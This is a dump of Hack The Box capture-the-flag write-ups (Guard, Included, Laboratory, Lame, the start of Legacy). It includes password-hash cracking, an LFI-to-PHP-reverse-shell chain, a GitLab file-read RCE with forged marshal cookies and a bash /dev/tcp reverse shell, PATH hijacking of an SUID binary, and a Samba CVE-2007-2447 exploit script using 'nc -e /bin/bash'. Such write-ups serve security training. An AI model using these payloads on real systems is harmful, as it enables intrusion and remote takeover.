118 | root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
119 | daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::
120 | ```
121 |
122 | Let's copy it to our local machine and let `john` try to crack the passwords for daniel, or in the best case for root. If we get the password for daniel, then we can atleast check if he is on the sudoers list and can execute some helpful commands that we can exploit to gain root privileges.
123 |
124 | But it's better than we thought. John is successful in cracking the root password!
125 |
126 | ```
127 | $ john shadow -w=/usr/share/wordlists/rockyou.txt
128 | Using default input encoding: UTF-8
129 | Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
130 | Cost 1 (iteration count) is 5000 for all loaded hashes
131 | Press 'q' or Ctrl-C to abort, almost any other key for status
132 |
133 | password#1 (root)
134 | ```
135 |
136 | Now we can log in as root and obtain the root flag.
137 |
138 | Root flag: `386ca63de3e5fd7df6b6212a0430f681`
--------------------------------------------------------------------------------
/Guard/pics/command_more.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Guard/pics/command_more.png
--------------------------------------------------------------------------------
/Guard/pics/more_trick.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Guard/pics/more_trick.png
--------------------------------------------------------------------------------
/Included/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Included
2 |
3 | ## Enumeration
4 |
5 | ```
6 | rustscan 10.10.10.55 -- -sC -sV -o port_scan
7 |
8 | PORT STATE SERVICE REASON VERSION
9 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
10 | | http-methods:
11 | |_ Supported Methods: GET HEAD POST OPTIONS
12 | |_http-server-header: Apache/2.4.29 (Ubuntu)
13 | | http-title: Site doesn't have a title (text/html; charset=UTF-8).
14 | |_Requested resource was http://10.10.10.55/?file=index.php
15 | ```
16 | So apparently only a single port is open. It's exposing an Apache webserver. Let's take a look at it.
17 |
18 | ### Examine Port 80 - Apache Server
19 |
20 | 
21 |
22 | Looking at the URL and having the name of the challenge in mind (`Included`), an experienced web penetration tester might directly think of Local File Inclusion (LFI).
23 |
24 | And indeed! Changing the URL to
25 | ```
26 | http://10.10.10.55/?file=../../../../../../../../etc/passwd
27 | ```
28 | reveals the `/etc/passwd` file of the server.
29 |
30 | 
31 |
32 | Now we check if we can also access `/proc/self/environ`. This file hosts the initial environment of the Apache process. Thus, the environmental variable User-Agent is likely to appear there. If we can access it, then we can easily create a reverse shell by injecting php code as e.g. the User-Agent in our request to the server (=Proc Environ Injection). Unfortunately, we cannot access it.
33 |
34 | Another possibility would be to access `/var/log/apache2/access.log` after we sent a request to the website with PHP code as file parameter. The PHP code would then be executed, when loading the log file (=Log Poisoning). However, that's also not possible. Therefore, we need another technique.
35 |
36 | A blog article with details about the various techniques can be found [here](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1).
37 |
38 | I was pretty much stuck at this point. So I went through all the enumeration steps again. Thereby, I noticed, that `rustscan` does not support UDP port scanning at the time I'm writing this (https://github.com/RustScan/RustScan/issues/22).
39 |
40 | Therefore, I ran the nmap scan again, but this time with a UDP scan:
41 |
42 | ```
43 | sudo nmap -sU 10.10.10.55
44 |
45 | PORT STATE SERVICE
46 | 69/udp open|filtered tftp
47 | ```
48 |
49 | That's perfect for our LFI! We can now upload files to `/var/lib/tftpboot` (which is the default location), due to the misconfigured TFTP service (--create, -c
50 | Allow new files to be created. By default, tftpd will only allow upload of files that already exist. Files are created with default permissions allowing anyone to read or write them, unless the --permissive or --umask options are specified.)
51 |
52 | So now we can upload a php file that contains code for a reverse shell to our machine. Afterwards, we will execute the file by loading it with our LFI vulnerability.
53 |
54 | For the PHP Shell, we use the Shell from Pentestmonkey (which is pretty much the standard when it comes to PHP reverse shells). We upload it with
55 |
56 | ```
57 | tftp 10.10.10.15
58 |
59 | put shell.php
60 | ```
61 |
62 | Now start the listener `nc -lvpn 4444` and include the file by accessing following page:
63 |
64 | ```
65 | http://10.10.10.55/?file=../../../../../var/lib/tftpboot/shell.php
66 | ```
67 |
68 | 
69 |
70 | ## Exploitation
71 |
72 | After several hours of research, I again had to take a look at the writeup, as I could not find any vulnerability on the system. And indeed! There is no vulnerability. The writeup simply says "The password Sheffield19 found in the previous can be used to switch to mike"... Like seriously, come on... Again one of those "we found the password in any of the previous machines for a completely unrelated user. It's obvious that you should use this password here as well". **FACEPALM** But w/e....
73 |
74 | Now that we are user `mike`, we can look for a way to escalate our privileges. But first let's retrieve the user flag: `a56ef91d70cfbf2cdb8f454c006935a1`
75 |
76 | Running the command `id`, we see that mike is in the group `lxc`. Following [this article](https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation), on how to obtain root privileges by abusing the `security.privileged=true` feature of lxc, we get root accces.
77 |
78 | ## Post-Exploitation
79 | In the root directory there are two files:
80 | - root.txt: `c693d9c7499d9f572ee375d4c14c7bcf`
81 | - login.sql: `Daniel:>SNDv*2wzLWf` (credentials for another machine)
--------------------------------------------------------------------------------
/Included/pics/etc_passwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/etc_passwd.png
--------------------------------------------------------------------------------
/Included/pics/reverse_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/reverse_shell.png
--------------------------------------------------------------------------------
/Included/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/website.png
--------------------------------------------------------------------------------
/Laboratory/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Laboratory (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.83.28 -- -sC -sV -o port_scans
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
12 | 80/tcp open http syn-ack Apache httpd 2.4.41
13 | 443/tcp open ssl/http syn-ack Apache httpd 2.4.41 ((Ubuntu))
14 | Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kerne
15 | ```
16 |
17 | ### Examine Port 80 - Apache server
18 |
19 | 
20 |
21 | On the website itself, we can't find anything interesting. No functionalities, no links. Everything is just pure plaintext. So let's see if we can find some directories.
22 |
23 | ```
24 | └──╼ $ gobuster dir -u "https://laboratory.htb" -w /usr/share/wordlists/dirb/big.txt -x php,html -k
25 | ===============================================================
26 | Gobuster v3.0.1
27 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
28 | ===============================================================
29 | [+] Url: https://laboratory.htb
30 | [+] Threads: 10
31 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt
32 | [+] Status codes: 200,204,301,302,307,401,403
33 | [+] User Agent: gobuster/3.0.1
34 | [+] Extensions: php,html
35 | [+] Timeout: 10s
36 | ===============================================================
37 | 2021/01/21 15:59:09 Starting gobuster
38 | ===============================================================
39 | /.htaccess (Status: 403)
40 | /.htaccess.php (Status: 403)
41 | /.htaccess.html (Status: 403)
42 | /.htpasswd (Status: 403)
43 | /.htpasswd.php (Status: 403)
44 | /.htpasswd.html (Status: 403)
45 | /assets (Status: 301)
46 | /images (Status: 301)
47 | /index.html (Status: 200)
48 | /server-status (Status: 403)
49 | ===============================================================
50 | 2021/01/21 16:03:32 Finished
51 | ===============================================================
52 | ```
53 |
54 | However, gobuster only discovers the typical standard directories. After investigating them, I still have no idea where to go from here. So I ran the nmap scan again. This time with basic scripts activated.
55 |
56 | Additionally to the previous output we also get more information about the domain.
57 |
58 | ```
59 | | ssl-cert: Subject: commonName=laboratory.htb
60 | | Subject Alternative Name: DNS:git.laboratory.htb
61 | | Issuer: commonName=laboratory.htb
62 | ```
63 |
64 | So apparently, there is also a subdomain called `git.laboratory.htb`. Let's add it to the hosts file and check it out.
65 |
66 |
67 | ### Examine Port 443 - Subdomain
68 |
69 | 
70 |
71 | Looking at the subdomain, we can see a GitLab server login page. As we don't have any credentials, the only possible way is to create an account.
72 |
73 | After creating an account (with a laboratory.htb email address), we have access to GitLab.
74 |
75 | 
76 |
77 | Browsing through the available projects, we quickly find the "SecureWebsite" Project.
78 |
79 | 
80 |
81 | However, the project does not give any valuable information. Atleast nothing that we do not already know. What about software issues in the server itself? Let's find out what version the server is.
82 |
83 | A quick check in google reveals that we can get the server version by navigating to `https://your.domain.name/help`
84 | so `https://git.laboratory.htb/help` in our case.
85 |
86 | 
87 |
88 | Server version 12.8.1. Now let's see if this specific version has any security flaws. And indeed! Searching for this version results in hundreds of hits for "File Read Remote Code Execution".
89 |
90 | *This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that GitLab uses internally for A/B testing. Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above when the vulnerable `experimentation_subject_id` cookie was introduced. Tested on GitLab 12.8.1 and 12.4.0. (https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_file_read_rce/)*
91 |
92 | A detailed article about the vulnerability can be found [here](https://hackerone.com/reports/827052).
93 |
94 | ## Gaining an Initial Foothold
95 |
96 | We can simply follow the instructions of the CVE report.
97 |
98 | It says that LFI is possible when including the file in an issue in one project and then move the issue to another project. The specified file will then be included, as the LFI prevention apparently does not happen when moving issues.
99 |
100 | So let's try if it works: we include /etc/passwd and create the issue in Project 1.
101 |
102 | 
103 |
104 | Now we move the issue to Project 2.
105 |
106 | 
107 |
108 | And indeed! We get access to the file! Amazing!
109 |
110 | 
111 |
112 | 
113 |
114 | In order to get RCE from the LFI, we first have to leak the `secrets.yml` file of the gitlab server. To do that we simply repeat the LFI steps as shown above with a different file included:
115 |
116 | ```
117 | 
118 | ```
119 |
120 | Perfect! Now that we have the secrets file, we can setup our gitlab locally (this is not necessarily needed, but helps for the next steps):
121 |
122 | So I installed gitlab locally by following these steps:
123 | 1) Download gitlab
124 | https://packages.gitlab.com/gitlab/gitlab-ce/packages/debian/stretch/gitlab-ce_12.8.10-ce.0_amd64.deb
125 | 2) sudo dpkg -i download.deb
126 | 3) sudo gitlab-ctl reconfigure
127 |
128 | Afterwards, I replaced the secret key of my local secret.yml file with the one from the leaked file.
129 |
130 | Now we create a reverse shell script that should be uploaded to the gitlab server (don't forget to change the IP and the port):
131 |
132 | Reverse shell:
133 | ```
134 | └──╼ $ cat rev_shell.sh
135 | #!/bin/bash
136 |
137 | bash -i >& /dev/tcp/10.10.14.26/4444 0>&1
138 | ```
139 |
140 | Afterwards, start a local HTTP server.
141 | ```
142 | sudo python3 -m http.server 8888
143 | ```
144 |
145 | The next step is to open the `gitlab-rails console` and execute following code. It will create a cookie that we can then inject as the `experimentation_subject_id`:
146 | ```
147 | request = ActionDispatch::Request.new(Rails.application.env_config)
148 | request.env["action_dispatch.cookies_serializer"] = :marshal
149 | cookies = request.cookie_jar
150 |
151 | erb = ERB.new("<%= `curl 10.10.14.26:8888/rev_shell.sh -o /tmp/rev_shell.sh` %>")
152 | depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
153 | cookies.signed[:cookie] = depr
154 | puts cookies[:cookie]
155 | ```
156 |
157 | Copy the output cookie and execute following to upload the reverse shell to the gitlab server:
158 |
159 | ```
160 | curl -vvv 'https://git.laboratory.htb/users/sign_in' -b
161 | "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHZha3p6IHdhcyBoZXJlID4gL3RtcC92YWt6emAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--256736af5cceb9bd73bbf17bfa3bf64985ac5767" -k
162 | ```
163 |
164 | Afterwards craft another cookie, which contains the command to execute the script.
165 |
166 | ```
167 | request = ActionDispatch::Request.new(Rails.application.env_config)
168 | request.env["action_dispatch.cookies_serializer"] = :marshal
169 | cookies = request.cookie_jar
170 |
171 | erb = ERB.new("<%= `bash /tmp/rev_shell.sh` %>")
172 | depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb,:result, "@result", ActiveSupport::Deprecation.new)
173 | cookies.signed[:cookie] = depr
174 | puts cookies[:cookie]
175 | ```
176 |
177 | Now set up a nc listener, copy the cookie and do the request:
178 |
179 | ```
180 | curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiWCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC90bXAvcmV2X3NoZWxsLnNoYCApLnRvX3MpOyBfZXJib3V0BjoGRUY6DkBlbmNvZGluZ0l1Og1FbmNvZGluZwpVVEYtOAY7CkY6E0Bmcm96ZW5fc3RyaW5nMDoOQGZpbGVuYW1lMDoMQGxpbmVub2kAOgxAbWV0aG9kOgtyZXN1bHQ6CUB2YXJJIgxAcmVzdWx0BjsKVDoQQGRlcHJlY2F0b3JJdTofQWN0aXZlU3VwcG9ydDo6RGVwcmVjYXRpb24ABjsKVA==--874f307ee34f95c27d0a9e79ba1900960d8d02e1" -k
181 | ```
182 |
183 | This will execute the reverse shell and you have access to the server!
184 |
185 | ```
186 | git@git:~/gitlab-rails/working$ hostname && id
187 | git.laboratory.htb
188 | uid=998(git) gid=998(git) groups=998(git)
189 | ```
190 |
191 | After some minutes of exploring the server, I realized that the git server has nothing interesting hidden. At least no flags that we can submit to HTB. So now, we somehow have gain access to the real server instead of just having access to the git server.
192 |
193 | In the official [GitLab Docs](https://docs.gitlab.com/ee/administration/troubleshooting/navigating_gitlab_via_rails_console.html), they explain how to use the gitlab-rails console to find users, change passwords and save the changes to the live server. We can use this to find existing users on the Gitlab server and then gain access to their accounts. Maybe they have some valuable information on their profiles. Let's follow the instructions of the docs.
194 |
195 | ```
196 | irb(main):001:0> user = User.find(1)
197 | user = User.find(1)
198 | => #
199 |
200 | irb(main):002:0> user.password = 'password'
201 | user.password = 'password'
202 | => "password"
203 |
204 | irb(main):003:0> user.save
205 | user.save
206 | Enqueued ActionMailer::DeliveryJob (Job ID: 45e0541c-9976-41d5-a6da-02db29294bc7) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #>
207 | => true
208 | ```
209 |
210 | Now going back to `git.laboratory.htb`, we can login as `dexter` with the password `password`
211 |
212 | 
213 |
214 | Going through his private respositories, we can find his private ssh key:
215 |
216 | 
217 |
218 | Using this, we can successfully login to his account on `laboratory.htb`.
219 |
220 | ```
221 | dexter@laboratory:~$ hostname && id
222 | laboratory
223 | uid=1000(dexter) gid=1000(dexter) groups=1000(dexter)
224 | ```
225 |
226 | ## Privilege Escalation
227 |
228 | We start by using the standard priv-esc techniques such as finding binaries with the SUID bit set.
229 |
230 | ```
231 | find / -perm -4000 -type f 2>/dev/null
232 |
233 | /usr/local/bin/docker-security
234 | /usr/bin/sudo
235 | /usr/bin/newgrp
236 | /usr/bin/su
237 | ```
238 |
239 | The binary `/usr/local/bin/docker-security` seems to be suspicious as it is usually not part of this list. So let's check it out.
240 |
241 | ```
242 | -rwsr-xr-x 1 root dexter 16720 Aug 28 14:52 /usr/local/bin/docker-security
243 | ```
244 |
245 | So our current user has permissions to execute it! Great. Let's do it and see what happens.... Nothing... hmm. Then we have to figure out what it does. But instead of reverse engineering it locally with some disassembler, we can start by running things like `ltrace` and `strace` to get a first idea of what is going on.
246 |
247 | ```
248 | dexter@laboratory:/usr/local/bin$ ltrace docker-security
249 | setuid(0) = -1
250 | setgid(0) = -1
251 | system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
252 |
253 | --- SIGCHLD (Child exited) ---
254 | <... system resumed> ) = 256
255 | system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
256 |
257 | --- SIGCHLD (Child exited) ---
258 | <... system resumed> ) = 256
259 | +++ exited (status 0) +++
260 | ```
261 |
262 | Apparently, the binary uses `chmod`. The issue with this is, that it does not use the absolute path. So we can create our own `chmod` and inject it into the path:
263 |
264 | ```
265 | dexter@laboratory:/tmp$ echo "/bin/bash" > chmod
266 | dexter@laboratory:/tmp$ chmod +x chmod
267 | dexter@laboratory:/tmp$ export PATH=.:${PATH}
268 | ```
269 |
270 | Now when we run the binary, the `chmod` call will be replaced by our chmod file, which contains /bin/sh. Let's run it!
271 |
272 | ```
273 | dexter@laboratory:/tmp$ /usr/local/bin/docker-security
274 | root@laboratory:/tmp# hostname && id
275 | laboratory
276 | uid=0(root) gid=0(root) groups=0(root),1000(dexter)
277 | ```
278 |
279 | Perfect! We pwned the machine!
280 |
--------------------------------------------------------------------------------
/Laboratory/pics/dexter_gitlab.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/dexter_gitlab.png
--------------------------------------------------------------------------------
/Laboratory/pics/dexter_sshkey.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/dexter_sshkey.png
--------------------------------------------------------------------------------
/Laboratory/pics/etc_passwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/etc_passwd.png
--------------------------------------------------------------------------------
/Laboratory/pics/git_logged_in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/git_logged_in.png
--------------------------------------------------------------------------------
/Laboratory/pics/git_server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/git_server.png
--------------------------------------------------------------------------------
/Laboratory/pics/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/help.png
--------------------------------------------------------------------------------
/Laboratory/pics/issue.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/issue.png
--------------------------------------------------------------------------------
/Laboratory/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/logo.png
--------------------------------------------------------------------------------
/Laboratory/pics/main_website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/main_website.png
--------------------------------------------------------------------------------
/Laboratory/pics/move_issue.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/move_issue.png
--------------------------------------------------------------------------------
/Laboratory/pics/project.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/project.png
--------------------------------------------------------------------------------
/Laboratory/pics/vulnerability.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/vulnerability.png
--------------------------------------------------------------------------------
/Lame/README.md:
--------------------------------------------------------------------------------
1 | 
2 | # Beginner Track - Lame
3 |
4 | ## Enumeration
5 |
6 | ```
7 | rustscan 10.129.72.52 -- -sC -sV -o port_scan
8 |
9 | PORT STATE SERVICE VERSION
10 | 21/tcp open ftp vsftpd 2.3.4
11 | |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
12 | | ftp-syst:
13 | | STAT:
14 | | FTP server status:
15 | | Connected to 10.10.14.50
16 | | Logged in as ftp
17 | | TYPE: ASCII
18 | | No session bandwidth limit
19 | | Session timeout in seconds is 300
20 | | Control connection is plain text
21 | | Data connections will be plain text
22 | | vsFTPd 2.3.4 - secure, fast, stable
23 | |_End of status
24 | 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25 | | ssh-hostkey:
26 | | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
27 | |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
28 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
29 | 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
30 | 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
31 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
32 | ```
33 |
34 | So we have an open FTP port (21) with Anonymous login allowed, an SSH port (22), open samba ports (139,445) and a distrubuted c/c++ compiler server on port 3632.
35 |
36 | ## Examine Port 21 - Anonymous allowed
37 |
38 | Connecting to the FTP server as client Anonymous works, however, the directory is completely empty.
39 |
40 | ```
41 | ftp> ls -la
42 | 200 PORT command successful. Consider using PASV.
43 | 150 Here comes the directory listing.
44 | drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
45 | drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
46 | 226 Directory send OK.
47 | ```
48 |
49 | ## Examine Port 139/445
50 |
51 | Let's start by enumerating the smb directories.
52 | ```
53 | └──╼ $ smbmap -H 10.129.72.52
54 | [+] IP: 10.129.72.52:445 Name: 10.129.72.52
55 | Disk Permissions Comment
56 | ---- ----------- -------
57 | print$ NO ACCESS Printer Drivers
58 | tmp READ, WRITE oh noes!
59 | opt NO ACCESS
60 | IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
61 | ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))-
62 | WORKGROUP LAME
63 | ```
64 |
65 | Apparently we have full read and write access to the `tmp` share.
66 |
67 | ```
68 | └──╼ $ smbclient //10.129.72.52/tmp
69 | Enter WORKGROUP\ctf's password:
70 | Anonymous login successful
71 | Try "help" to get a list of possible commands.
72 | smb: \> dir
73 | . D 0 Wed Jan 6 13:57:48 2021
74 | .. DR 0 Sat Oct 31 08:33:58 2020
75 | .ICE-unix DH 0 Wed Jan 6 13:45:02 2021
76 | 5571.jsvc_up R 0 Wed Jan 6 13:46:17 2021
77 | vmware-root DR 0 Wed Jan 6 13:45:29 2021
78 | .X11-unix DH 0 Wed Jan 6 13:45:30 2021
79 | .X0-lock HR 11 Wed Jan 6 13:45:30 2021
80 | vgauthsvclog.txt.0 R 1600 Wed Jan 6 13:45:00 2021
81 |
82 | 7282168 blocks of size 1024. 5385876 blocks available
83 | ```
84 |
85 | After investigating all the files, and finding nothing, I looked up if there are any known vulnerabilities for this specific Samba version (3.0.20).
86 |
87 | ```
88 | searchsploit samba 3.0.20
89 | ```
90 |
91 | 
92 |
93 | ## Exploitation
94 |
95 | The one we need is the "Username" map script. There are two ways you can exploit this vulnerability. Either with metasploit, which runs the exploit without telling you what actually happens in the background OR do it manually and you learn every single step. But that's totally up to you. I decided to try the manual approach.
96 |
97 | Explanation of the vulnerability:
98 |
99 | CVE-2007-2447 - Samba usermap script
100 | Samba 3.0.0 - 3.0.25rc3 are subject for Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a username containing shell meta characters.
101 |
102 | The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking non-default "username map script" configuration option in smb.conf, so no authentication is needed to exploit this vulnerability.
103 |
104 | To exploit this vulnerability, all you need to do is to change the username for authentication to your payload in combination with `nohup`. I wrote a short python script for that purpose.
105 |
106 | ```python
107 | #!/usr/bin/python
108 |
109 | import sys
110 | from smb.SMBConnection import SMBConnection
111 |
112 | def exploit(rhost, rport, lhost, lport):
113 | payload = 'nc -e /bin/bash 10.10.14.50 4444'
114 | username = "/=`nohup " + payload + "`"
115 | conn = SMBConnection(username, "", "", "")
116 | err = conn.connect(rhost, rport)
117 | if not err:
118 | print("[+] Done !")
119 |
120 | if __name__ == '__main__':
121 | print("[*] CVE-2007-2447 - Samba usermap script")
122 | if len(sys.argv) != 5:
123 | print("[-] usage: python " + sys.argv[0] + " ")
124 | else:
125 | print("[+] Connecting !")
126 | try:
127 | rhost = sys.argv[1]
128 | rport = int(sys.argv[2])
129 | lhost = sys.argv[3]
130 | lport = int(sys.argv[4])
131 | exploit(rhost, rport, lhost, lport)
132 | except ValueError:
133 | print("ERROR: Port must be an integer")
134 | exit(0)
135 | ```
136 |
137 | Here we connect with the user set to our reverse shell payload.
138 |
139 | ```
140 | └──╼ $ python3 exploit.py 10.129.72.52 139 10.10.14.50 4444
141 | [*] CVE-2007-2447 - Samba usermap script
142 | [+] Connecting !
143 | [+] Done
144 | ```
145 |
146 | This results in:
147 |
148 | ```
149 | └──╼ $ nc -lvnp 4444
150 | listening on [any] 4444 ...
151 | connect to [10.10.14.50] from (UNKNOWN) [10.129.72.52] 43267
152 | id
153 | uid=0(root) gid=0(root)
154 | ```
155 |
156 | An alternative would be to use smbclient to connect to the tmp share.
157 |
158 | Afterwards type following:
159 |
160 | ```
161 | smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.50 4444`"
162 | ```
163 | This is the manual approach without a script.
164 |
165 | ## Post Exploitation
166 |
167 | Now we can obtain the userflag (/home/makis/user.txt) and the rootflag (/root/root.txt)
--------------------------------------------------------------------------------
/Lame/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Lame/pics/logo.png
--------------------------------------------------------------------------------
/Lame/pics/searchsploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Lame/pics/searchsploit.png
--------------------------------------------------------------------------------
/Legacy/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 | # Legacy (Windows)
5 |
6 | ## Enumeration
7 |
8 | ```
9 | rustscan 10.129.79.117 -- -sC -sV -o port_scan
10 |
11 | PORT STATE SERVICE VERSION
12 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
13 | 445/tcp open microsoft-ds Windows XP microsoft-ds
14 | 3389/tcp closed ms-wbt-server
15 | Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
16 |
17 | Host script results:
18 | |_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
19 | |_nbstat: NetBIOS name: nil, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:41:6a (VMware)
20 | | smb-os-discovery:
21 | | OS: Windows XP (Windows 2000 LAN Manager)
22 | | OS CPE: cpe:/o:microsoft:windows_xp::-
23 | | Computer name: legacy
24 | | NetBIOS computer name: LEGACY\x00
25 | | Workgroup: HTB\x00
26 | |_ System time: 2021-01-18T17:21:39+02:00
27 | | smb-security-mode:
28 | | account_used:
29 | | authentication_level: user
30 | | challenge_response: supported
31 | |_ message_signing: disabled (dangerous, but default)
32 | |_smb2-time: Protocol negotiation failed (SMB2)
33 |
34 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
35 | ```
36 |
37 | Both SMB ports, 139 & 445, are open. So this is again a machine with an SMB challenge/vulnerability.
38 |
39 | By running the default nmap scripts (-sC), we can already see that it's a machine with a rather old OS (Windows XP with Windows 2000 LAN Manager). This might be the reason why this machine is called `Legacy`. Let's further investigate that.
40 |
41 | ## Exploitation
42 |
